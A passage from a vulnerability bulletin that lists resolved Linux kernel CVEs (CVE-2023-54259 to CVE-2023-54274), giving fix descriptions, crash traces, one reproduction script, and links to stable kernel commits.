so always needs a put. The code can just flow through and do the pm_runtime_put() unconditionally. | 2025-12-30 | not yet calculated | CVE-2023-54259 | https://git.kernel.org/stable/c/4e5e9da139c007dfc397a159093b4c4187ee67fa https://git.kernel.org/stable/c/203aa4374c433159f163acde2d0bd4118f23bbaf https://git.kernel.org/stable/c/e9537962519e88969f5f69cd0571eb4f6984403c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix lost destroy smbd connection when MR allocate failed If the MR allocate failed, the smb direct connection info is NULL, then smbd_destroy() will directly return, then the connection info will be leaked. Let's set the smb direct connection info to the server before call smbd_destroy(). | 2025-12-30 | not yet calculated | CVE-2023-54260 | https://git.kernel.org/stable/c/d303e25887127364a6765eaf7ac68aa2bac518a9 https://git.kernel.org/stable/c/324c0c34fff1affd436e509325cb46739209704e https://git.kernel.org/stable/c/caac205e0d5b44c4c23a10c6c0976d50ebe16ac2 https://git.kernel.org/stable/c/46cd6c639cddba2bd2d810ceb16bb20374ad75b0 https://git.kernel.org/stable/c/c51ae01104b318bf15f3c5097faba5c72addba7a https://git.kernel.org/stable/c/04b7e13b8a13264282f874db5378fc3d3253cfac https://git.kernel.org/stable/c/e9d3401d95d62a9531082cd2453ed42f2740e3fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Add missing gfx11 MQD manager callbacks mqd_stride function was introduced in commit 2f77b9a242a2 ("drm/amdkfd: Update MQD management on multi XCC setup") but not assigned for gfx11. Fixes a NULL dereference in debugfs. | 2025-12-30 | not yet calculated | CVE-2023-54261 | https://git.kernel.org/stable/c/399b73d6b7720a9eae68a333193b53ed4f432fe5 https://git.kernel.org/stable/c/e9dca969b2426702a73719ab9207e43c6d80b581 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Don't clone flow post action attributes second time The code already clones post action attributes in mlx5e_clone_flow_attr_for_post_act(). Creating another copy in mlx5e_tc_post_act_add() is a erroneous leftover from original implementation. Instead, assign handle->attribute to post_attr provided by the caller. Note that cloning the attribute second time is not just wasteful but also causes issues like second copy not being properly updated in neigh update code which leads to following use-after-free: Feb 21 09:02:00 c-237-177-40-045 kernel: BUG: KASAN: use-after-free in mlx5_cmd_set_fte+0x200d/0x24c0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_report+0xbb/0x1a0 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_save_stack+0x1e/0x40 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_set_track+0x21/0x30 Feb 21 09:02:00 c-237-177-40-045 kernel: __kasan_kmalloc+0x7a/0x90 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_save_stack+0x1e/0x40 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_set_track+0x21/0x30 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_save_free_info+0x2a/0x40 Feb 21 09:02:00 c-237-177-40-045 kernel: ____kasan_slab_free+0x11a/0x1b0 Feb 21 09:02:00 c-237-177-40-045 kernel: page dumped because: kasan: bad access detected Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_core 0000:08:00.0: mlx5_cmd_out_err:803:(pid 8833): SET_FLOW_TABLE_ENTRY(0x936) op_mod(0x0) failed, status bad resource state(0x9), syndrome (0xf2ff71), err(-22) Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_core 0000:08:00.0 enp8s0f0: Failed to add post action rule Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_core 0000:08:00.0: mlx5e_tc_encap_flows_add:190:(pid 8833): Failed to update flow post acts, -22 Feb 21 09:02:00 c-237-177-40-045 kernel: Call Trace: Feb 21 09:02:00 c-237-177-40-045 kernel: <TASK> Feb 21 09:02:00 c-237-177-40-045 kernel: dump_stack_lvl+0x57/0x7d Feb 21 09:02:00 c-237-177-40-045 kernel: print_report+0x170/0x471 Feb 21 09:02:00 c-237-177-40-045 kernel: ? mlx5_cmd_set_fte+0x200d/0x24c0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_report+0xbb/0x1a0 Feb 21 09:02:00 c-237-177-40-045 kernel: ? mlx5_cmd_set_fte+0x200d/0x24c0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_cmd_set_fte+0x200d/0x24c0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: ? __module_address.part.0+0x62/0x200 Feb 21 09:02:00 c-237-177-40-045 kernel: ? mlx5_cmd_stub_create_flow_table+0xd0/0xd0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: ? __raw_spin_lock_init+0x3b/0x110 Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_cmd_create_fte+0x80/0xb0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: add_rule_fg+0xe80/0x19c0 [mlx5_core] -- Feb 21 09:02:00 c-237-177-40-045 kernel: Allocated by task 13476: Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_save_stack+0x1e/0x40 Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_set_track+0x21/0x30 Feb 21 09:02:00 c-237-177-40-045 kernel: __kasan_kmalloc+0x7a/0x90 Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5_packet_reformat_alloc+0x7b/0x230 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_tc_tun_create_header_ipv4+0x977/0xf10 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_attach_encap+0x15b4/0x1e10 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: post_process_attr+0x305/0xa30 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_tc_add_fdb_flow+0x4c0/0xcf0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: __mlx5e_add_fdb_flow+0x7cf/0xe90 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_configure_flower+0xcaa/0x4b90 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_rep_setup_tc_cls_flower+0x99/0x1b0 [mlx5_core] Feb 21 09:02:00 c-237-177-40-045 kernel: mlx5e_rep_setup_tc_cb+0x133/0x1e0 [mlx5_core] -- Feb 21 09:02:00 c-237-177-40-045 kernel: Freed by task 8833: Feb 21 09:02:00 c-237-177-40-045 kernel: kasan_save_s ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54262 | https://git.kernel.org/stable/c/c382b693ffcb1f1ebf60d76ab9dedfe9ea13eedf https://git.kernel.org/stable/c/8fd1dac646e6b08d03e3f1ad3c5b34255b1e08e8 https://git.kernel.org/stable/c/2d57a514f9ab7d2d40f49b02d93edfcec8c78a9e https://git.kernel.org/stable/c/e9fce818fe003b6c527f25517b9ac08eb4661b5d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/nouveau/kms/nv50-: init hpd_irq_lock for PIOR DP Fixes OOPS on boards with ANX9805 DP encoders. | 2025-12-30 | not yet calculated | CVE-2023-54263 | https://git.kernel.org/stable/c/92d48ce21645267c574268678131cd2b648dad0f https://git.kernel.org/stable/c/ea293f823a8805735d9e00124df81a8f448ed1ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/sysv: Null check to prevent null-ptr-deref bug sb_getblk(inode->i_sb, parent) return a null ptr and taking lock on that leads to the null-ptr-deref bug. | 2025-12-30 | not yet calculated | CVE-2023-54264 | https://git.kernel.org/stable/c/e976988bc245ec3768cc0f76bed7d05488a7dd0f https://git.kernel.org/stable/c/baa60c66a310c50785289b0ede6fdce8ec3219c7 https://git.kernel.org/stable/c/0a44ceba77c3267f8505dda102a59367dc24caee https://git.kernel.org/stable/c/7f740bc696d4617f8ee44565e8ac0d36278a1e91 https://git.kernel.org/stable/c/afd9a31b5aa4b3747f382d44a7b03b7b5d0b7635 https://git.kernel.org/stable/c/1416eebaad80bdc85ad9f97f27242011b031e2a9 https://git.kernel.org/stable/c/e28f376dd8dfcc4e880ac101184132bc08703f6e https://git.kernel.org/stable/c/ea2b62f305893992156a798f665847e0663c9f41 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix an uninit variable access bug in __ip6_make_skb() Syzbot reported a bug as following: ===================================================== BUG: KMSAN: uninit-value in arch_atomic64_inc arch/x86/include/asm/atomic64_64.h:88 [inline] BUG: KMSAN: uninit-value in arch_atomic_long_inc include/linux/atomic/atomic-long.h:161 [inline] BUG: KMSAN: uninit-value in atomic_long_inc include/linux/atomic/atomic-instrumented.h:1429 [inline] BUG: KMSAN: uninit-value in __ip6_make_skb+0x2f37/0x30f0 net/ipv6/ip6_output.c:1956 arch_atomic64_inc arch/x86/include/asm/atomic64_64.h:88 [inline] arch_atomic_long_inc include/linux/atomic/atomic-long.h:161 [inline] atomic_long_inc include/linux/atomic/atomic-instrumented.h:1429 [inline] __ip6_make_skb+0x2f37/0x30f0 net/ipv6/ip6_output.c:1956 ip6_finish_skb include/net/ipv6.h:1122 [inline] ip6_push_pending_frames+0x10e/0x550 net/ipv6/ip6_output.c:1987 rawv6_push_pending_frames+0xb12/0xb90 net/ipv6/raw.c:579 rawv6_sendmsg+0x297e/0x2e60 net/ipv6/raw.c:922 inet_sendmsg+0x101/0x180 net/ipv4/af_inet.c:827 sock_sendmsg_nosec net/socket.c:714 [inline] sock_sendmsg net/socket.c:734 [inline] ____sys_sendmsg+0xa8e/0xe70 net/socket.c:2476 ___sys_sendmsg+0x2a1/0x3f0 net/socket.c:2530 __sys_sendmsg net/socket.c:2559 [inline] __do_sys_sendmsg net/socket.c:2568 [inline] __se_sys_sendmsg net/socket.c:2566 [inline] __x64_sys_sendmsg+0x367/0x540 net/socket.c:2566 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd Uninit was created at: slab_post_alloc_hook mm/slab.h:766 [inline] slab_alloc_node mm/slub.c:3452 [inline] __kmem_cache_alloc_node+0x71f/0xce0 mm/slub.c:3491 __do_kmalloc_node mm/slab_common.c:967 [inline] __kmalloc_node_track_caller+0x114/0x3b0 mm/slab_common.c:988 kmalloc_reserve net/core/skbuff.c:492 [inline] __alloc_skb+0x3af/0x8f0 net/core/skbuff.c:565 alloc_skb include/linux/skbuff.h:1270 [inline] __ip6_append_data+0x51c1/0x6bb0 net/ipv6/ip6_output.c:1684 ip6_append_data+0x411/0x580 net/ipv6/ip6_output.c:1854 rawv6_sendmsg+0x2882/0x2e60 net/ipv6/raw.c:915 inet_sendmsg+0x101/0x180 net/ipv4/af_inet.c:827 sock_sendmsg_nosec net/socket.c:714 [inline] sock_sendmsg net/socket.c:734 [inline] ____sys_sendmsg+0xa8e/0xe70 net/socket.c:2476 ___sys_sendmsg+0x2a1/0x3f0 net/socket.c:2530 __sys_sendmsg net/socket.c:2559 [inline] __do_sys_sendmsg net/socket.c:2568 [inline] __se_sys_sendmsg net/socket.c:2566 [inline] __x64_sys_sendmsg+0x367/0x540 net/socket.c:2566 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3d/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd It is because icmp6hdr does not in skb linear region under the scenario of SOCK_RAW socket. Access icmp6_hdr(skb)->icmp6_type directly will trigger the uninit variable access bug. Use a local variable icmp6_type to carry the correct value in different scenarios. | 2025-12-30 | not yet calculated | CVE-2023-54265 | https://git.kernel.org/stable/c/165370522cc48127da564a08584a7391e6341908 https://git.kernel.org/stable/c/f394f690a30a5ec0413c62777a058eaf3d6e10d5 https://git.kernel.org/stable/c/0cf600ca1bdf1d52df977516ee6cee0cadb1f6b1 https://git.kernel.org/stable/c/605b056d63302ae84eb136e88d4df49124bd5e0d https://git.kernel.org/stable/c/d65ff2fe877c471aa6e79efa7bd8ff66e147c317 https://git.kernel.org/stable/c/2c9cefc142c1dc2759e19a92d3b2b3715e985beb https://git.kernel.org/stable/c/02ed5700f40445af02d1c97db25ffc2d04971d9f https://git.kernel.org/stable/c/ea30388baebcce37fd594d425a65037ca35e59e8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-usb: m920x: Fix a potential memory leak in m920x_i2c_xfer() 'read' is freed when it is known to be NULL, but not when a read error occurs. Revert the logic to avoid a small leak, should a m920x_read() call fail. | 2025-12-30 | not yet calculated | CVE-2023-54266 | https://git.kernel.org/stable/c/809623fedc31f4e74039d93bb75a8993635d7534 https://git.kernel.org/stable/c/c0178e938f110cdf6937f26975c0c951dbb1d9db https://git.kernel.org/stable/c/75d6ef197c488cd852493b4a419274e3489da79d https://git.kernel.org/stable/c/d13a84874a2e0236c9325b3adc8e126d0888ad6b https://git.kernel.org/stable/c/7ca7cd02114ac8caa6b0a64734b9af6be1559353 https://git.kernel.org/stable/c/2b6e20ef0585a467c24c7e4fde28518e5b33225a https://git.kernel.org/stable/c/4feed3dfca722c6d74865a37cab853c58e6aa190 https://git.kernel.org/stable/c/2cc9f11aeae2887a4db25c27323fc445f4b49e86 https://git.kernel.org/stable/c/ea9ef6c2e001c5dc94bee35ebd1c8a98621cf7b8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/pseries: Rework lppaca_shared_proc() to avoid DEBUG_PREEMPT lppaca_shared_proc() takes a pointer to the lppaca which is typically accessed through get_lppaca(). With DEBUG_PREEMPT enabled, this leads to checking if preemption is enabled, for example: BUG: using smp_processor_id() in preemptible [00000000] code: grep/10693 caller is lparcfg_data+0x408/0x19a0 CPU: 4 PID: 10693 Comm: grep Not tainted 6.5.0-rc3 #2 Call Trace: dump_stack_lvl+0x154/0x200 (unreliable) check_preemption_disabled+0x214/0x220 lparcfg_data+0x408/0x19a0 ... This isn't actually a problem however, as it does not matter which lppaca is accessed, the shared proc state will be the same. vcpudispatch_stats_procfs_init() already works around this by disabling preemption, but the lparcfg code does not, erroring any time /proc/powerpc/lparcfg is accessed with DEBUG_PREEMPT enabled. Instead of disabling preemption on the caller side, rework lppaca_shared_proc() to not take a pointer and instead directly access the lppaca, bypassing any potential preemption checks. [mpe: Rework to avoid needing a definition in paca.h and lppaca.h] | 2025-12-30 | not yet calculated | CVE-2023-54267 | https://git.kernel.org/stable/c/953c54dfdc5d3eb7243ed902b50acb5ea1db4355 https://git.kernel.org/stable/c/2935443dc9c28499223d8c881474259e4b998f2a https://git.kernel.org/stable/c/4c8568cf4c45b415854195c8832b557cdefba57a https://git.kernel.org/stable/c/3c5e8e666794d7dde6d14ea846c6c04f2bb34900 https://git.kernel.org/stable/c/f45ee5c074013a0fbfce77a5af5efddb01f5d4f4 https://git.kernel.org/stable/c/eac030b22ea12cdfcbb2e941c21c03964403c63f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: debugobjects: Don't wake up kswapd from fill_pool() syzbot is reporting a lockdep warning in fill_pool() because the allocation from debugobjects is using GFP_ATOMIC, which is (__GFP_HIGH | __GFP_KSWAPD_RECLAIM) and therefore tries to wake up kswapd, which acquires kswapd_wait::lock. Since fill_pool() might be called with arbitrary locks held, fill_pool() should not assume that acquiring kswapd_wait::lock is safe. Use __GFP_HIGH instead and remove __GFP_NORETRY as it is pointless for !__GFP_DIRECT_RECLAIM allocation. | 2025-12-30 | not yet calculated | CVE-2023-54268 | https://git.kernel.org/stable/c/be646802b3dc408c4dc72a3ac32c3f4a0282414d https://git.kernel.org/stable/c/fd673079749bac97bb30f1461df079e6c8e86511 https://git.kernel.org/stable/c/aee97eec77029270866c704f66cdf2881cbd2fe1 https://git.kernel.org/stable/c/d7fff52c99d52f180d8bef95d8ed8fec6343889c https://git.kernel.org/stable/c/4c088d30a72d9b8f9c6ae9362222942e4075cb00 https://git.kernel.org/stable/c/eb799279fb1f9c63c520fe8c1c41cb9154252db6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: double free xprt_ctxt while still in use When an RPC request is deferred, the rq_xprt_ctxt pointer is moved out of the svc_rqst into the svc_deferred_req. When the deferred request is revisited, the pointer is copied into the new svc_rqst - and also remains in the svc_deferred_req. In the (rare?) case that the request is deferred a second time, the old svc_deferred_req is reused - it still has all the correct content. However in that case the rq_xprt_ctxt pointer is NOT cleared so that when xpo_release_xprt is called, the ctxt is freed (UDP) or possible added to a free list (RDMA). When the deferred request is revisited for a second time, it will reference this ctxt which may be invalid, and the free the object a second time which is likely to oops. So change svc_defer() to *always* clear rq_xprt_ctxt, and assert that the value is now stored in the svc_deferred_req. | 2025-12-30 | not yet calculated | CVE-2023-54269 | https://git.kernel.org/stable/c/7851771789e87108a92697194105ef0c9307dc5e https://git.kernel.org/stable/c/fd86534872f445f54dc01e7db001e25eadf063a8 https://git.kernel.org/stable/c/e0c648627322a4c7e018e5c7f837c3c03e297dbb https://git.kernel.org/stable/c/eb8d3a2c809abd73ab0a060fe971d6b9019aa3c1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: usb: siano: Fix use after free bugs caused by do_submit_urb There are UAF bugs caused by do_submit_urb(). One of the KASan reports is shown below: [ 36.403605] BUG: KASAN: use-after-free in worker_thread+0x4a2/0x890 [ 36.406105] Read of size 8 at addr ffff8880059600e8 by task kworker/0:2/49 [ 36.408316] [ 36.408867] CPU: 0 PID: 49 Comm: kworker/0:2 Not tainted 6.2.0-rc3-15798-g5a41237ad1d4-dir8 [ 36.411696] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g15584 [ 36.416157] Workqueue: 0x0 (events) [ 36.417654] Call Trace: [ 36.418546] <TASK> [ 36.419320] dump_stack_lvl+0x96/0xd0 [ 36.420522] print_address_description+0x75/0x350 [ 36.421992] print_report+0x11b/0x250 [ 36.423174] ? _raw_spin_lock_irqsave+0x87/0xd0 [ 36.424806] ? __virt_addr_valid+0xcf/0x170 [ 36.426069] ? worker_thread+0x4a2/0x890 [ 36.427355] kasan_report+0x131/0x160 [ 36.428556] ? worker_thread+0x4a2/0x890 [ 36.430053] worker_thread+0x4a2/0x890 [ 36.431297] ? worker_clr_flags+0x90/0x90 [ 36.432479] kthread+0x166/0x190 [ 36.433493] ? kthread_blkcg+0x50/0x50 [ 36.434669] ret_from_fork+0x22/0x30 [ 36.435923] </TASK> [ 36.436684] [ 36.437215] Allocated by task 24: [ 36.438289] kasan_set_track+0x50/0x80 [ 36.439436] __kasan_kmalloc+0x89/0xa0 [ 36.440566] smsusb_probe+0x374/0xc90 [ 36.441920] usb_probe_interface+0x2d1/0x4c0 [ 36.443253] really_probe+0x1d5/0x580 [ 36.444539] __driver_probe_device+0xe3/0x130 [ 36.446085] driver_probe_device+0x49/0x220 [ 36.447423] __device_attach_driver+0x19e/0x1b0 [ 36.448931] bus_for_each_drv+0xcb/0x110 [ 36.450217] __device_attach+0x132/0x1f0 [ 36.451470] bus_probe_device+0x59/0xf0 [ 36.452563] device_add+0x4ec/0x7b0 [ 36.453830] usb_set_configuration+0xc63/0xe10 [ 36.455230] usb_generic_driver_probe+0x3b/0x80 [ 36.456166] printk: console [ttyGS0] disabled [ 36.456569] usb_probe_device+0x90/0x110 [ 36.459523] really_probe+0x1d5/0x580 [ 36.461027] __driver_probe_device+0xe3/0x130 [ 36.462465] driver_probe_device+0x49/0x220 [ 36.463847] __device_attach_driver+0x19e/0x1b0 [ 36.465229] bus_for_each_drv+0xcb/0x110 [ 36.466466] __device_attach+0x132/0x1f0 [ 36.467799] bus_probe_device+0x59/0xf0 [ 36.469010] device_add+0x4ec/0x7b0 [ 36.470125] usb_new_device+0x863/0xa00 [ 36.471374] hub_event+0x18c7/0x2220 [ 36.472746] process_one_work+0x34c/0x5b0 [ 36.474041] worker_thread+0x4b7/0x890 [ 36.475216] kthread+0x166/0x190 [ 36.476267] ret_from_fork+0x22/0x30 [ 36.477447] [ 36.478160] Freed by task 24: [ 36.479239] kasan_set_track+0x50/0x80 [ 36.480512] kasan_save_free_info+0x2b/0x40 [ 36.481808] ____kasan_slab_free+0x122/0x1a0 [ 36.483173] __kmem_cache_free+0xc4/0x200 [ 36.484563] smsusb_term_device+0xcd/0xf0 [ 36.485896] smsusb_probe+0xc85/0xc90 [ 36.486976] usb_probe_interface+0x2d1/0x4c0 [ 36.488303] really_probe+0x1d5/0x580 [ 36.489498] __driver_probe_device+0xe3/0x130 [ 36.491140] driver_probe_device+0x49/0x220 [ 36.492475] __device_attach_driver+0x19e/0x1b0 [ 36.493988] bus_for_each_drv+0xcb/0x110 [ 36.495171] __device_attach+0x132/0x1f0 [ 36.496617] bus_probe_device+0x59/0xf0 [ 36.497875] device_add+0x4ec/0x7b0 [ 36.498972] usb_set_configuration+0xc63/0xe10 [ 36.500264] usb_generic_driver_probe+0x3b/0x80 [ 36.501740] usb_probe_device+0x90/0x110 [ 36.503084] really_probe+0x1d5/0x580 [ 36.504241] __driver_probe_device+0xe3/0x130 [ 36.505548] driver_probe_device+0x49/0x220 [ 36.506766] __device_attach_driver+0x19e/0x1b0 [ 36.508368] bus_for_each_drv+0xcb/0x110 [ 36.509646] __device_attach+0x132/0x1f0 [ 36.510911] bus_probe_device+0x59/0xf0 [ 36.512103] device_add+0x4ec/0x7b0 [ 36.513215] usb_new_device+0x863/0xa00 [ 36.514736] hub_event+0x18c7/0x2220 [ 36.516130] process_one_work+ ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54270 | https://git.kernel.org/stable/c/c379272ea9c2ee36f0a1327b0fb8889c975093f7 https://git.kernel.org/stable/c/1477b00ff582970df110fc9e15a5e2021acb9222 https://git.kernel.org/stable/c/a41bb59eff7a58a6772f84a5b70ad7ec26dad074 https://git.kernel.org/stable/c/42f8ba8355682f6c4125b75503cac0cef4ac91d3 https://git.kernel.org/stable/c/114f768e7314ca9e1fdbebe11267c4403e89e7f2 https://git.kernel.org/stable/c/479796534a450fd44189080d51bebefa3b42c6fc https://git.kernel.org/stable/c/19aadf0eb70edae7180285dbb9bfa237d1ddb34d https://git.kernel.org/stable/c/ebad8e731c1c06adf04621d6fd327b860c0861b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: Fix NULL deref caused by blkg_policy_data being installed before init blk-iocost sometimes causes the following crash: BUG: kernel NULL pointer dereference, address: 00000000000000e0 ... RIP: 0010:_raw_spin_lock+0x17/0x30 Code: be 01 02 00 00 e8 79 38 39 ff 31 d2 89 d0 5d c3 0f 1f 00 0f 1f 44 00 00 55 48 89 e5 65 ff 05 48 d0 34 7e b9 01 00 00 00 31 c0 <f0> 0f b1 0f 75 02 5d c3 89 c6 e8 ea 04 00 00 5d c3 0f 1f 84 00 00 RSP: 0018:ffffc900023b3d40 EFLAGS: 00010046 RAX: 0000000000000000 RBX: 00000000000000e0 RCX: 0000000000000001 RDX: ffffc900023b3d20 RSI: ffffc900023b3cf0 RDI: 00000000000000e0 RBP: ffffc900023b3d40 R08: ffffc900023b3c10 R09: 0000000000000003 R10: 0000000000000064 R11: 000000000000000a R12: ffff888102337000 R13: fffffffffffffff2 R14: ffff88810af408c8 R15: ffff8881070c3600 FS: 00007faaaf364fc0(0000) GS:ffff88842fdc0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00000000000000e0 CR3: 00000001097b1000 CR4: 0000000000350ea0 Call Trace: <TASK> ioc_weight_write+0x13d/0x410 cgroup_file_write+0x7a/0x130 kernfs_fop_write_iter+0xf5/0x170 vfs_write+0x298/0x370 ksys_write+0x5f/0xb0 __x64_sys_write+0x1b/0x20 do_syscall_64+0x3d/0x80 entry_SYSCALL_64_after_hwframe+0x46/0xb0 This happens because iocg->ioc is NULL. The field is initialized by ioc_pd_init() and never cleared. The NULL deref is caused by blkcg_activate_policy() installing blkg_policy_data before initializing it. blkcg_activate_policy() was doing the following: 1. Allocate pd's for all existing blkg's and install them in blkg->pd[]. 2. Initialize all pd's. 3. Online all pd's. blkcg_activate_policy() only grabs the queue_lock and may release and re-acquire the lock as allocation may need to sleep. ioc_weight_write() grabs blkcg->lock and iterates all its blkg's. The two can race and if ioc_weight_write() runs during #1 or between #1 and #2, it can encounter a pd which is not initialized yet, leading to crash. The crash can be reproduced with the following script: #!/bin/bash echo +io > /sys/fs/cgroup/cgroup.subtree_control systemd-run --unit touch-sda --scope dd if=/dev/sda of=/dev/null bs=1M count=1 iflag=direct echo 100 > /sys/fs/cgroup/system.slice/io.weight bash -c "echo '8:0 enable=1' > /sys/fs/cgroup/io.cost.qos" & sleep .2 echo 100 > /sys/fs/cgroup/system.slice/io.weight with the following patch applied: > diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c > index fc49be622e05..38d671d5e10c 100644 > --- a/block/blk-cgroup.c > +++ b/block/blk-cgroup.c > @@ -1553,6 +1553,12 @@ int blkcg_activate_policy(struct gendisk *disk, const struct blkcg_policy *pol) > pd->online = false; > } > > + if (system_state == SYSTEM_RUNNING) { > + spin_unlock_irq(&q->queue_lock); > + ssleep(1); > + spin_lock_irq(&q->queue_lock); > + } > + > /* all allocated, init in the same order */ > if (pol->pd_init_fn) > list_for_each_entry_reverse(blkg, &q->blkg_list, q_node) I don't see a reason why all pd's should be allocated, initialized and onlined together. The only ordering requirement is that parent blkgs to be initialized and onlined before children, which is guaranteed from the walking order. Let's fix the bug by allocating, initializing and onlining pd for each blkg and holding blkcg->lock over initialization and onlining. This ensures that an installed blkg is always fully initialized and onlined removing the the race window. | 2025-12-30 | not yet calculated | CVE-2023-54271 | https://git.kernel.org/stable/c/e39ef7880d1057b2ebcdb013405f4d84a257db23 https://git.kernel.org/stable/c/7d63c6f9765339dcfc34b7365ced7c518012e4fe https://git.kernel.org/stable/c/ec14a87ee1999b19d8b7ed0fa95fea80644624ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix a possible null-pointer dereference in ni_clear() In a previous commit c1006bd13146, ni->mi.mrec in ni_write_inode() could be NULL, and thus a NULL check is added for this variable. However, in the same call stack, ni->mi.mrec can be also dereferenced in ni_clear(): ntfs_evict_inode(inode) ni_write_inode(inode, ...) ni = ntfs_i(inode); is_rec_inuse(ni->mi.mrec) -> Add a NULL check by previous commit ni_clear(ntfs_i(inode)) is_rec_inuse(ni->mi.mrec) -> No check Thus, a possible null-pointer dereference may exist in ni_clear(). To fix it, a NULL check is added in this function. | 2025-12-30 | not yet calculated | CVE-2023-54272 | https://git.kernel.org/stable/c/20f9bfc664d6a478f9a5bbc0c380f80f7a1a06c6 https://git.kernel.org/stable/c/39c6312009574ca73865354133ca222e7753a71b https://git.kernel.org/stable/c/e7675f85a92233136c630000a0b7cf97826705da https://git.kernel.org/stable/c/ec275bf9693d19cc0fdce8436f4c425ced86f6e7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: Fix leak of dev tracker At the stage of direction checks, the netdev reference tracker is already initialized, but released with wrong *_put() call. | 2025-12-30 | not yet calculated | CVE-2023-54273 | https://git.kernel.org/stable/c/7d16c515059b3746f2d6a24a74c3ba786a68c2a1 https://git.kernel.org/stable/c/ec8f32ad9a65a8cbb465b69e154aaec9d2fe45c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/srpt: Add a check for valid 'mad_agent' pointer When unregistering MAD agent, srpt module has a non-null check for 'mad_agent' pointer before invoking ib_unregister_mad_agent(). This check can pass if 'mad_agent' variable holds an error value. The 'mad_agent' can have an error value for a short window when srpt_add_one() and srpt_remove_one() is executed simultaneously. In srpt module, added a valid pointer check for 'sport->mad_agent' before unregistering MAD agent. This issue can hit when RoCE driver unregisters ib_device Stack Trace: ------------ BUG: kernel NULL pointer dereference, address: 000000000000004d PGD 145003067 P4D 145003067 PUD 2324fe067 PMD 0 Oops: 0002 [#1] PREEMPT SMP NOPTI CPU: 10 PID: 4459 Comm: kworker/u80:0 Kdump: loaded Tainted: P Hardware name: Dell Inc. PowerEdge R640/06NR82, BIOS 2.5.4 01/13/2020 Workqueue: bnxt_re bnxt_re_task [bnxt_re] RIP: 0010:_raw_spin_lock_irqsave+0x19/0x40 Call Trace: ib_unregister_mad_agent+0x46/0x2f0 [ib_core] IPv6: ADDRCONF(NETDEV_CHANGE): bond0: link becomes ready ? __schedule+0x20b/0x560 srpt_unregister_mad_agent+0x93/0xd0 [ib_srpt] srpt_remove_one+0x20/0x150 [ib_srpt] remove_client_context+0x88/0xd0 [ib_core] bond0: (slave p2p1): link status definitely up, 100000 Mbps full duplex disable_device+0x8a/0x160 [ib_core] bond0: active interface up! ? kernfs_name_hash+0x12/0x80 (NULL device *): Bonding Info Received: rdev: 000000006c0b8247 __ib_unregister_device+0x42/0xb0 [ib_core] (NULL device *): Master: mode: 4 num_slaves:2 ib_unregister_device+0x22/0x30 [ib_core] (NULL device *): Slave: id: 105069936 name:p2p1 link:0 state:0 bnxt_re_stopqps_and_ib_uninit+0x83/0x90 [bnxt_re] bnxt_re_alloc_lag+0x12e/0x4e0 [bnxt_re] | 2025-12-30 | not yet calculated | CVE-2023-54274 | https://git.kernel.org/stable/c/8ec6acdb9b6a80eeb13e778dfedb5d72a88f14fe https://git.kernel.org/stable/c/00cc21e32ea1b8ebbabf5d645da9378d986bf8ba https://git.kernel.org/stable/c/4323aaedeba32076e652aad056afd7885bb96bb7 https://git.kernel.org/stable/c/5f6ef2a574b0e0e0ea46ed0022575442df9d0bf9 https://git.kernel.org/stable/c/b713623bfef8cb1df9c769a3887fa10db63d1c54 https://git.kernel.org/stable/c/eca5cd9474cd26d62f9756f536e2e656d3f62f3a |
